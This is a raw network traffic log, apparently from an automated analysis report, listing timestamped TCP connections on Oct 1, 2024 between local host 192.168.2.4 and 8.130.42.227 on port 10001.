                                                                Oct 1, 2024 09:18:56.475544930 CEST10001498358.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:18:56.475650072 CEST4983510001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:18:56.475863934 CEST4983510001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:18:56.480575085 CEST10001498358.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:18:56.588474989 CEST4983610001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:18:56.593374014 CEST10001498368.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:18:56.593533993 CEST4983610001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:18:56.593599081 CEST4983610001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:18:56.598372936 CEST10001498368.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:18:57.540667057 CEST10001498368.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:18:57.540719986 CEST4983610001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:18:57.540744066 CEST10001498368.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:18:57.540781975 CEST4983610001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:18:57.540920019 CEST4983610001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:18:57.545691967 CEST10001498368.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:18:57.651444912 CEST4983710001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:18:57.656472921 CEST10001498378.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:18:57.656733036 CEST4983710001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:18:57.656733036 CEST4983710001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:18:57.661489010 CEST10001498378.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:18:58.615809917 CEST10001498378.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:18:58.615950108 CEST10001498378.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:18:58.616731882 CEST4983710001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:18:58.616733074 CEST4983710001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:18:58.621601105 CEST10001498378.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:18:58.730041027 CEST4983810001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:18:58.734985113 CEST10001498388.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:18:58.735065937 CEST4983810001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:18:58.742556095 CEST4983810001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:18:58.747329950 CEST10001498388.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:18:59.713992119 CEST10001498388.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:18:59.714059114 CEST4983810001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:18:59.714471102 CEST10001498388.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:18:59.714526892 CEST4983810001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:18:59.843524933 CEST4983910001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:18:59.843530893 CEST4983810001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:18:59.848423958 CEST10001498388.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:18:59.848438025 CEST10001498398.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:18:59.848553896 CEST4983910001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:18:59.848725080 CEST4983910001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:18:59.853851080 CEST10001498398.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:19:00.832353115 CEST10001498398.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:19:00.832406998 CEST10001498398.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:19:00.832432985 CEST4983910001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:19:00.832467079 CEST4983910001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:19:00.832578897 CEST4983910001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:19:00.837388039 CEST10001498398.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:19:00.946706057 CEST4984010001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:19:01.118649960 CEST10001498408.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:19:01.118755102 CEST4984010001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:19:01.118943930 CEST4984010001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:19:01.123672009 CEST10001498408.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:19:02.068789005 CEST10001498408.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:19:02.068809032 CEST10001498408.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:19:02.068887949 CEST4984010001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:19:02.069011927 CEST4984010001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:19:02.073781967 CEST10001498408.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:19:02.195688963 CEST4984110001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:19:02.200557947 CEST10001498418.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:19:02.204703093 CEST4984110001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:19:02.204703093 CEST4984110001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:19:02.209476948 CEST10001498418.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:19:03.153043985 CEST10001498418.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:19:03.153088093 CEST10001498418.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:19:03.153098106 CEST4984110001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:19:03.153175116 CEST4984110001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:19:03.153233051 CEST4984110001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:19:03.157989979 CEST10001498418.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:19:03.284426928 CEST4984210001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:19:03.289364100 CEST10001498428.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:19:03.289429903 CEST4984210001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:19:03.290126085 CEST4984210001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:19:03.294928074 CEST10001498428.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:19:04.241883039 CEST10001498428.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:19:04.241904020 CEST10001498428.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:19:04.246598005 CEST4984210001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:19:04.250360012 CEST4984210001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:19:04.255156040 CEST10001498428.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:19:04.531752110 CEST4984310001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:19:04.536899090 CEST10001498438.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:19:04.540657043 CEST4984310001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:19:04.541111946 CEST4984310001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:19:04.545854092 CEST10001498438.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:19:05.506321907 CEST10001498438.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:19:05.506380081 CEST4984310001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:19:05.506465912 CEST10001498438.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:19:05.506509066 CEST4984310001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:19:05.506781101 CEST4984310001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:19:05.511543989 CEST10001498438.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:19:05.634125948 CEST4984410001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:19:05.639158010 CEST10001498448.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:19:05.639230967 CEST4984410001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:19:05.639437914 CEST4984410001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:19:05.647650957 CEST10001498448.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:19:06.611948967 CEST10001498448.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:19:06.612035990 CEST10001498448.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:19:06.612184048 CEST4984410001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:19:06.612320900 CEST4984410001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:19:06.617111921 CEST10001498448.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:19:06.759057999 CEST4984510001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:19:06.769104004 CEST10001498458.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:19:06.769185066 CEST4984510001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:19:06.769355059 CEST4984510001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:19:06.779541969 CEST10001498458.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:19:07.713140011 CEST10001498458.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:19:07.713452101 CEST10001498458.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:19:07.716739893 CEST4984510001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:19:07.716739893 CEST4984510001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:19:07.721659899 CEST10001498458.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:19:07.884598017 CEST4984610001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:19:07.889714956 CEST10001498468.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:19:07.890803099 CEST4984610001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:19:07.890803099 CEST4984610001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:19:07.895657063 CEST10001498468.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:19:08.837522984 CEST10001498468.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:19:08.837553024 CEST10001498468.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:19:08.837610960 CEST4984610001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:19:08.837610960 CEST4984610001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:19:08.837779045 CEST4984610001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:19:08.842489004 CEST10001498468.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:19:08.961987972 CEST4984710001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:19:08.966895103 CEST10001498478.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:19:08.966960907 CEST4984710001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:19:08.967098951 CEST4984710001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:19:08.971838951 CEST10001498478.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:19:09.922214985 CEST10001498478.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:19:09.922235966 CEST10001498478.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:19:09.922437906 CEST4984710001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:19:09.922437906 CEST4984710001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:19:09.927278996 CEST10001498478.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:19:10.136635065 CEST4984810001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:19:10.141506910 CEST10001498488.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:19:10.142796040 CEST4984810001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:19:10.142796040 CEST4984810001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:19:10.147631884 CEST10001498488.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:19:11.239603996 CEST10001498488.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:19:11.239655972 CEST4984810001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:19:11.239764929 CEST10001498488.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:19:11.239804983 CEST4984810001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:19:11.243002892 CEST4984810001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:19:11.247859955 CEST10001498488.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:19:11.399759054 CEST4984910001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:19:11.404678106 CEST10001498498.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:19:11.404736042 CEST4984910001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:19:11.404921055 CEST4984910001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:19:11.409662008 CEST10001498498.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:19:12.383945942 CEST10001498498.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:19:12.383964062 CEST10001498498.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:19:12.386734962 CEST4984910001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:19:12.386734962 CEST4984910001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:19:12.391550064 CEST10001498498.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:19:12.560586929 CEST4985010001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:19:12.565453053 CEST10001498508.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:19:12.565803051 CEST4985010001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:19:12.566149950 CEST4985010001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:19:12.570997000 CEST10001498508.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:19:13.536622047 CEST10001498508.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:19:13.536698103 CEST4985010001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:19:13.536760092 CEST10001498508.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:19:13.536806107 CEST4985010001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:19:13.649327993 CEST4985010001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:19:13.649756908 CEST4985110001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:19:13.654346943 CEST10001498508.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:19:13.654588938 CEST10001498518.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:19:13.654696941 CEST4985110001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:19:13.654870033 CEST4985110001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:19:13.660190105 CEST10001498518.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:19:14.618599892 CEST10001498518.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:19:14.618616104 CEST10001498518.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:19:14.618716002 CEST4985110001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:19:14.618716002 CEST4985110001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:19:14.618880987 CEST4985110001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:19:14.623709917 CEST10001498518.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:19:14.774863958 CEST4985210001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:19:14.779814005 CEST10001498528.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:19:14.779891014 CEST4985210001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:19:14.780076981 CEST4985210001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:19:14.784828901 CEST10001498528.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:19:15.770656109 CEST10001498528.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:19:15.770724058 CEST10001498528.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:19:15.775007963 CEST4985210001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:19:15.775007963 CEST4985210001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:19:15.779818058 CEST10001498528.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:19:15.962827921 CEST4985310001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:19:15.969052076 CEST10001498538.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:19:15.970726967 CEST4985310001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:19:15.970824957 CEST4985310001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:19:15.975732088 CEST10001498538.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:19:16.917601109 CEST10001498538.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:19:16.917649984 CEST4985310001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:19:16.917942047 CEST10001498538.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:19:16.917985916 CEST4985310001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:19:17.051831007 CEST4985310001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:19:17.052295923 CEST4985410001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:19:17.056850910 CEST10001498538.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:19:17.057121992 CEST10001498548.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:19:17.057174921 CEST4985410001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:19:17.060981989 CEST4985410001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:19:17.066051960 CEST10001498548.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:19:18.005870104 CEST10001498548.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:19:18.006073952 CEST10001498548.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:19:18.007050037 CEST4985410001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:19:18.008409977 CEST4985410001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:19:18.013389111 CEST10001498548.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:19:18.182761908 CEST4985510001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:19:18.187864065 CEST10001498558.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:19:18.191450119 CEST4985510001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:19:18.191450119 CEST4985510001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:19:18.196357965 CEST10001498558.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:19:19.142124891 CEST10001498558.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:19:19.142158985 CEST10001498558.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:19:19.142194986 CEST4985510001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:19:19.142247915 CEST4985510001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:19:19.142343998 CEST4985510001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:19:19.147134066 CEST10001498558.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:19:19.259216070 CEST4985610001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:19:19.264137983 CEST10001498568.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:19:19.264199972 CEST4985610001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:19:19.264523983 CEST4985610001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:19:19.269332886 CEST10001498568.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:19:20.207957983 CEST10001498568.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:19:20.208007097 CEST10001498568.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:19:20.210882902 CEST4985610001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:19:20.210882902 CEST4985610001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:19:20.215812922 CEST10001498568.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:19:20.322662115 CEST4985710001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:19:20.327600956 CEST10001498578.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:19:20.330912113 CEST4985710001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:19:20.330912113 CEST4985710001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:19:20.335696936 CEST10001498578.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:19:21.334633112 CEST10001498578.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:19:21.334691048 CEST4985710001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:19:21.334808111 CEST10001498578.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:19:21.334887028 CEST4985710001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:19:21.458328962 CEST4985710001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:19:21.458683968 CEST4985810001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:19:21.463212013 CEST10001498578.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:19:21.463449955 CEST10001498588.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:19:21.463506937 CEST4985810001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:19:21.464631081 CEST4985810001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:19:21.469950914 CEST10001498588.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:19:22.470978975 CEST10001498588.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:19:22.471136093 CEST10001498588.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:19:22.475179911 CEST4985810001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:19:22.475179911 CEST4985810001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:19:22.480025053 CEST10001498588.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:19:22.649112940 CEST4985910001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:19:22.654309034 CEST10001498598.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:19:22.654994965 CEST4985910001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:19:22.655162096 CEST4985910001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:19:22.660196066 CEST10001498598.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:19:23.599531889 CEST10001498598.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:19:23.599551916 CEST10001498598.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:19:23.599601984 CEST4985910001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:19:23.599714041 CEST4985910001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:19:23.681149960 CEST4985910001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:19:23.686049938 CEST10001498598.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:19:23.870928049 CEST4986010001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:19:23.876133919 CEST10001498608.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:19:23.878796101 CEST4986010001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:19:23.878797054 CEST4986010001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:19:23.884027958 CEST10001498608.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:19:24.837048054 CEST10001498608.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:19:24.837064028 CEST10001498608.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:19:24.837105036 CEST4986010001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:19:24.837152004 CEST4986010001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:19:24.837296963 CEST4986010001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:19:24.843811035 CEST10001498608.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:19:24.947304964 CEST4986110001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:19:24.952342033 CEST10001498618.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:19:24.952402115 CEST4986110001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:19:24.952651024 CEST4986110001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:19:24.957484007 CEST10001498618.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:19:25.934140921 CEST10001498618.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:19:25.934766054 CEST10001498618.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:19:25.934897900 CEST4986110001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:19:25.935338974 CEST4986110001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:19:25.940253019 CEST10001498618.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:19:26.086643934 CEST4986210001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:19:26.091499090 CEST10001498628.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:19:26.091608047 CEST4986210001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:19:26.094698906 CEST4986210001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:19:26.099898100 CEST10001498628.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:19:27.087327003 CEST10001498628.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:19:27.087377071 CEST4986210001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:19:27.087631941 CEST10001498628.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:19:27.087671041 CEST4986210001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:19:27.196681023 CEST4986210001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:19:27.197154045 CEST4986310001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:19:27.201548100 CEST10001498628.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:19:27.201997042 CEST10001498638.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:19:27.202058077 CEST4986310001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:19:27.202214956 CEST4986310001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:19:27.206932068 CEST10001498638.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:19:28.172127962 CEST10001498638.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:19:28.172149897 CEST10001498638.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:19:28.172842026 CEST4986310001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:19:28.172842026 CEST4986310001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:19:28.177858114 CEST10001498638.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:19:28.292599916 CEST4986410001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:19:28.297525883 CEST10001498648.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:19:28.300782919 CEST4986410001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:19:28.300782919 CEST4986410001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:19:28.305711031 CEST10001498648.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:19:29.264139891 CEST10001498648.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:19:29.264158964 CEST10001498648.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:19:29.264189005 CEST4986410001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:19:29.264245033 CEST4986410001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:19:29.264311075 CEST4986410001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:19:29.269030094 CEST10001498648.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:19:29.368805885 CEST4986510001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:19:29.373811007 CEST10001498658.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:19:29.373869896 CEST4986510001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:19:29.374037027 CEST4986510001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:19:29.379060030 CEST10001498658.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:19:30.313374043 CEST10001498658.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:19:30.313394070 CEST10001498658.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:19:30.316787004 CEST4986510001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:19:30.316787004 CEST4986510001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:19:30.321688890 CEST10001498658.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:19:30.432600021 CEST4986610001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:19:30.437896967 CEST10001498668.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:19:30.438182116 CEST4986610001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:19:30.438182116 CEST4986610001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:19:30.443001986 CEST10001498668.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:19:31.392505884 CEST10001498668.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:19:31.392560959 CEST4986610001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:19:31.392673016 CEST10001498668.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:19:31.392719984 CEST4986610001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:19:31.508542061 CEST4986610001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:19:31.508907080 CEST4986710001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:19:31.513547897 CEST10001498668.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:19:31.515166044 CEST10001498678.130.42.227192.168.2.4
